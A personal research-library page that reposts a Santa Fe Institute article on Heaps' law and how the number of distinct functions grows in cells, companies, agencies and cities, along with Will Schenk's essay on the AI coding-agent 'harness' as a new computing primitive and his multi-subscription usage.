  • Home > Ajabbi Research > Library > Subscriptions > Parallax
  • Home > Handbook > 

Last Updated

04/05/2026

How function diversity scales, from cells to companies

By: Santa Fe Institute
Parallax: 18/02/2026

Mike is the inventor and architect of Pipi and the founder of Ajabbi.

A mystery novel, a history book, and a fantasy epic may have little in common in plot or style. But count the words inside them and a strange regularity appears: many new words show up early, then fewer and fewer as the author reuses what has already been introduced.

That pattern, known as Heaps’ law, turns out not to belong to books alone. A new study in PNAS finds that the same rule also describes the growth patterns in many complex systems, from living cells and corporations to universities and government agencies — and could even be used to predict how they will change in the future.

The study, led by scientists at the Santa Fe Institute and MIT, doesn’t just document this regularity; it introduces a mathematical model that quantifies how different systems diversify and specialize. It finds that, while systems vary in how much they invest in creating entirely new functions, once those functions exist, their subsequent growth follows a remarkably universal rich-get-richer process.

“What’s striking is that these systems weren’t designed to follow the same rules,” says SFI Program Postdoctoral Fellow James Holehouse, who co-led the study with Vicky Chuqiao Yang, a former SFI Omidyar Fellow now at MIT. “Yet when you look at how they grow, you see the same trade-off between adding something new and building on what already exists.”

“It is remarkable that cells, bureaucracies, and companies, despite obvious differences, all grow their function repertoire with a similar pattern.”

In the study, researchers focus on what they call “distinct functions” — the different kinds of work a system performs. In a cell, that might mean different proteins. In an organization, it could mean different kinds of jobs. As systems grow, they do add new kinds of work, but they do so more and more slowly over time.

Using their model, the team analyzed dozens of bacterial and microbial cells, more than a hundred U.S. federal agencies, thousands of companies and universities, and hundreds of metropolitan areas. Across most of these cases, the same pattern appeared: as systems got bigger, the pace at which they added new functions steadily slowed, growing sublinearly.

In practical terms, sublinear growth means that doubling the size of a system does not double the number of functions inside it. Instead, growth increasingly comes from expanding what already exists. A growing organization hires more people into established jobs before creating new titles. A cell produces more of the proteins it already uses instead of evolving entirely new ones.

“It is remarkable that cells, bureaucracies, and companies, despite obvious differences, all grow their function repertoire with a similar pattern,” says Yang, an assistant professor at MIT Sloan and the Institute for Data, Systems, and Society. “This suggests that the regularity discovered in Heaps’ law applies not only to what humans create, like books, but also to human organizations themselves.”

Cities, however, follow a different version of the same trend. They still add new kinds of jobs as they grow, but they do so much more slowly, following a logarithmic pattern rather than the power-law pattern seen in other systems. Even as populations soar, genuinely new job types become increasingly rare.

That difference reflects a deeper structural divide. Cells, firms, and agencies behave like organisms, with clear boundaries and unified goals. Cities, by contrast, resemble ecosystems shaped by the independent choices of individuals rather than centralized control.

Geoffrey West, a co-author and Santa Fe Institute Shannan Distinguished Professor, adds, “There are underlying regularities shaping how complexity builds, even in systems that look completely different on the surface.”

This material is based upon work supported by the U.S. National Science Foundation under Award No. 2526746

The Neural Harness: The new CPU

Mike's Notes

Some deep insights here from Will Schneck. Asking more questions than he answers. Especially deterministic vs probabilistic. Where does emergence emerge? 😎😎

Resources

References

  • Reference

Repository

  • Home > Ajabbi Research > Library > Subscriptions > The Focus AI
  • Home > Handbook > 

Last Updated

03/05/2026

The Neural Harness: The new CPU

By: Will Schenk
The Focus AI: 01/05/2026

I am a father, entrepreneur, technologist and aspiring woodsman.

My wife Ksenia and I live in the woods of Northwest Connecticut with our four boys and one baby girl. I have a lumber mill and all the kids love using the tractor.

I’m currently building The Focus AI, Umwelten, and Cornwall Market.

"Coding agents will build their own tools and their own agents. Agents will be used by non-engineers to manage other agents to manage parts of the org chart."


I'm on my second Claude Max plan. That's in addition to Cursor, Codex, Gemini, and a healthy Amp habit. Not to mention a Jetson AGX Thor I'm about to plug in at the office — more on that one later.

Overnight jobs parsing financial deal structures, ops stuff, research, monitoring logs, responding to events, all the little background things. The first plan tapped out, I added another, that one tapped out too, and now I'm provisioning a third the way you'd add a build runner. Mundane.

A new entry in an old list

Look at the paragraph I just wrote. Overnight jobs parsing financial deal structures, ops stuff, research, monitoring logs, responding to events. Half of those words are themselves names of native units of computing. Logs — log aggregators. Events — event streams. Research — search indexes. Ops — schedulers, orchestrators, deployment systems. Jobs — queues. The lede is already a list of older units I'm wiring into.

Computing has been accreting native units forever, and the way you build the next layer is by composing the units underneath it.

You combine adders and accumulators to make a CPU. You combine CPUs and memory and a bus to make a machine. You combine logic gates and clocks to make registers. You combine Boolean functions and a process model to make an operating system. You combine lexers and parsers and code generators to make a compiler. You combine source files and a compiler to make a program. You combine programs and a network stack to make a service. You combine services and a database to make an application. You combine applications and a queue to make a pipeline. You combine pipelines and a stream processor to make a real-time system. You combine streams and a log aggregator to make observability. You combine logs and a metric and an anomaly model to make a monitor. You combine all of it and a scheduler and you have a system that runs without you watching it.

Flat-color treemap of the computing stack: small blocks for adders, clocks, registers, cpu, memory, bus growing diagonally up and to the right through machine, os, compiler, program, service, application, pipeline, stream, observability, monitor — culminating in a large block for scheduler.

Each layer is just the layer below, composed. That's what a native unit is — the thing you stop writing yourself, the thing you wire to. You don't write a compiler. You don't write a Postgres. You don't write a Kafka or a Kubernetes or a Lucene or a git. You pick the unit, you combine it with other units, you build on top.

Now look at that list again. Everything on it is sitting on top of Boolean logic. Silicon, gates, arithmetic, state machines, if/then. Numbers, types, queries, schedules, indexes — all of it is deterministic logic resolving down to ones and zeros. You can climb that stack pretty high, but you don't get out of it.

19th-century geological cross-section: layered strata of fossilized circuit traces — gates, clocks, registers, CPU, OS, compiler, program, service, application — opening into a newly excavated neural floor below, soft coral and cream tones, neuron tendrils threading up into the rock. The new floor under the old stack.

Neural nets aren't more of that. They're a different kind of logic. Pattern, association, similarity, fuzzy matching, generation. The thing silicon-and-Boolean was bad at, that we kept failing to solve with cleverer rules, the neural net does natively. We added a new floor — GPUs, TPUs, the Cerebras inference fabric, the Jetson on my desk — and a new kind of computation running on it that doesn't reduce to if A and B then C.

By themselves these things predict tokens. They don't loop, they don't read files, they don't remember. To get computation out of one you wrap it. A loop, some tools, file access, a shell, a way to manage context. That wrapper is the harness. The harness is the unit that turns "predicts the next token" into "does the work" — and lets the new kind of logic compose with the old kind.

The neural harness is to neural nets what the compiler was to source code. New entry on the list, joining the family rather than replacing it. The work I'm running on these two-going-on-three Max plans is mostly the harness wiring into the older units — tailing logs, querying state, watching streams, kicking off jobs, hitting indexes. New unit, old units, composed.

That's why the second Max plan isn't weird. The bill scales with how much work you're doing in the new unit. I'm doing a lot of work in the new unit.

How it shows up in a day

It really has stopped being a tool I reach for; its just the tool.

When I'm coding, I'm in a harness. When I'm reading a PDF I needed to read anyway, the harness is the thing reading it. Operations folder — SOWs, invoices, content ideas, project status — that's a harness. Parsing 20 financial deal docs and writing me a summary while I sleep — harness. Family infographics, fasting tracker, oura ring trends — harness, harness, harness. Different work, same unit.

Small-multiples grid: the same harness icon repeated across sixteen everyday domains — code editor, PDF reading, invoice, SOW draft, content ideas, project status, financial deal, overnight job, log monitor, email triage, family infographic, fasting tracker, Oura trends, calendar, research note, ops dashboard. One unit, many domains.

Coding was just the first place this paid off, because the feedback loop is tightest. Compile or don't, test or don't, the world tells you you're wrong inside a second. So that's where the harness got tuned first. That's why the unit is called a "coding agent" right now. But "coding" is vestigial. The thing isn't a coding agent. It's a harness around a model, and what runs in it is whatever you have tools for.

Rick Blalock said it in AI Engineering Miami — coding agent as universal software primitive. A 60-year-old in Texas replaced a $10k/month HubSpot bill by pointing one of these at the problem for three months. A 24-year-old window cleaner in Florida runs marketing, sales, and estimating off the same primitive. Both of them bought MacMinis. Tim Cook didn't have that on his bingo card.

The model question is below the harness question

Here's something I noticed about my own behavior: I'm mainly on Claude. Have been for months. I dip in and out of GPT and Grok and Gemini, but just sort of end up back here. Not because I reasoned out a model strategy — because Claude Code defaults to it and now I'm on Opus all day every day. Amp has its opinion and I try to set Cursor to super max mode, but really the model picked itself by way of the harness picking it for me.

So the perennial "Opus vs GPT-5 vs Gemini 3" argument is pitched one floor below where the action is. It's not model-vs-model. It's harness-with-default-model vs other-harness-with-default-model. The harness drives the model choice, often without telling you.

And underneath that, there's a whole zoo. Frontier reasoning models. Cheap fast models. Code-specific fine-tunes. Local models that run on the GPU you already own. Cerebras-fast inference at 1,200 tokens/sec, a different regime entirely. And the inside-the-harness thing: Tejas Bhakta at Miami called it "everything is models" — a compaction model running every two seconds, a code-search model at 80k tokens/sec, a frontier model doing only the heavy reasoning, all stitched together. Software 3.5, he called it. The harness picks all of that for you, or doesn't, depending on which harness.

Da Vinci anatomical-plate: a single mechanical harness apparatus on top labeled HARNESSIS — UNITAS SUPERIOR with four tool-attachments (LEGERE, SCRIBERE, IMPERARE, ITERARE), and below it a labeled menagerie of seven model 'species' — Frontier, Velox, Codicis, Localis, Compactionis, Quaerens, Cerebras — drawn as small mechanical creatures on aged parchment.

Which means the harness is a model strategy. Picking a harness on purpose means picking which models do which jobs inside it.

So which harness?

A separate post coming soon — each one deserves its own treatment and the conversation moves week to week. The shape of it:

You can build your own in a weekend. About 50 lines gets you the loop. Highly recommend, even if you never use it. Claude Code is the one everyone uses, and — by Anthropic's own model on Anthropic's own benchmark — the worst Claude harness on offer. (Niels Rogge posted Terminal-Bench 2: same Opus 4.6, Claude Code last, ForgeCode and Capy at 70-75%. Twenty-five points of accuracy from picking a different harness.) Picode is Mario Zechner's minimal, self-modifying one — four tools, the agent writes its own extensions, hot-reloads in the session. The most fun one to play with right now. Amp is the one I'm most fascinated with — though to be clear, I'm editing this post in Cursor. The multimodel thing actually works now. In January I wrote that Amp "should be better, but, you know, isn't." Four months later: it is.

Tufte-style horizontal bar chart of Terminal-Bench 2 scores on the same Opus 4.6: ForgeCode 74%, Capy 71%, Picode 62%, Amp 55%, Claude Code 49% — outlined in vermilion. Annotation on the right: 25-point gap from picking a different harness.

The point of this post is the unit, not the catalog.

What I'm still circling

Da Vinci notebook spread with marginalia: a Jetson AGX Thor on a small workbench labeled MACHINA LOCALIS, a brass token-cost gauge labeled STIPENDIUM TOKEN — quanto?, a half-configured harness with question marks labeled HARNESSIS CONFIGURATA — UNITAS NAVIS?, and a small chart of a rising line labeled LINEA NOVA IN STATU FINANCIALI. Sepia ink on parchment, inkwell and quill in the corner.

What's the unit of shipping? Ben Davis's claim in Miami was that it's becoming a directory of skill files plus a coding-agent runtime. That feels right. But the runtime is also moving — picode's bet is that it should be malleable inside the session, so you can't pin it. Maybe the unit is even smaller. Maybe the unit is the harness, configured.

What about the Jetson on my desk. The other thing the bill is about to teach us is that some of this work shouldn't be paying a subscription at all. Local models on local hardware — gpt-oss, Qwen, MiniMax, whatever's frontier-enough for the job — running on the GPU you already own, or the Jetson, or the laptop. Cheap as electricity. No data leaving the building. The harness doesn't care which model it's calling. The bill cares a lot. I think a real chunk of what's running on the second Max plan ends up local by the end of the year.

When the bill becomes a real line item — and it will — what does that conversation sound like? "Cloud spend" took ten years to become its own column on the financial statement. "Token spend" might take less. We're paying for a unit of computation, not for software. Different shape entirely.

I'll get the third Max plan tomorrow. There's another job.